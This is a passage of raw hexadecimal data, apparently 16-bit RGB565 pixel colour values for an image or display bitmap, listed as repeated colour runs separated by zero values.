0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe8e4, 0xc618, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xef36, 0xef36, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 